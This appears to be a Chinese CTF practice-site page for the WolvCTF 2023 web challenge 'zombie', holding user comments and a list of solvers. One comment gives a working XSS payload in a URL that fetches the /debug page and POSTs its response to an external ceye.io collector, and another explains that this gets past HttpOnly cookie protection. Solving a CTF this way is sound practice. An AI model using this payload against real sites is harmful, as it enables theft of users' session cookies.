zombie-201WEB 未解决

分数: 0 金币: 0
所属赛事: WolvCTF 2023
题目作者: 未知
一  血: heyile
一血奖励: 0金币
解  决: 72
提  示:
描  述:
wctf{}
评论
15031597817 2月前

怎么做的?

回复 0

vincentshine 1年前

http://82.157.146.43:10973/zombie?show=<script>fetch('http://82.157.146.43:10973/debug').then(data => { fetch('http://xxxx.ceye.io',{method: 'POST', body: data}) })</script>

回复 0

justsosoloveyou 2年前

httponly禁止了js读取cookie,要考虑绕过。由于debug页面的响应包含cookie,那就让后台管理访问debug页面,然后将页面响应回传。要注意js编码和要对页面响应内容编码。

回复 7

WriteUp

image
zzhicecyb

0 金币

评分(0)

暂无评分

解题动态

18715082837 攻破了该题 1月前
xiaobai19860830 攻破了该题 1月前
Fanllspd 攻破了该题 1月前
15511011321 攻破了该题 1月前
yanzong668 攻破了该题 2月前
luvwq 攻破了该题 2月前
Spring_LT 攻破了该题 2月前
inc1udeK 攻破了该题 3月前
Alenm 攻破了该题 3月前
lipton22 攻破了该题 3月前
Susen 攻破了该题 3月前
中年七叔 攻破了该题 4月前
divinesh 攻破了该题 4月前
Ch3ss 攻破了该题 4月前
菜鸟起飞 攻破了该题 4月前
miraiz 攻破了该题 4月前
cjydawn 攻破了该题 5月前
nuxe 攻破了该题 5月前
15008241322 攻破了该题 6月前
脆脆sha_ 攻破了该题 6月前
问题反馈